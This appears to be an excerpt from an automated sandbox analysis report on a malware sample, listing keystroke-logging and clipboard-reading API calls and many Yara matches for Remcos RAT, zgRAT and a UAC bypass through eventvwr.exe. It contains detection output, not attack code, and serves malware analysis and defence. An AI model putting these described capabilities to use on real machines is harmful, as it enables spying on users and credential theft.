Code function: 17_2_00408B9A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

17_2_00408B9A

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00409D9C OpenClipboard,GetClipboardData,CloseClipboard,

17_2_00409D9C

Contains functionality to read the clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00409D9C OpenClipboard,GetClipboardData,CloseClipboard,

17_2_00409D9C

Creates a DirectInput object (often for capturing keystrokes)

Source: Qerdo.exe, 00000013.00000002.597284812.0000000000878000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.5440000.4.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.48f0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.48f0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.5440000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
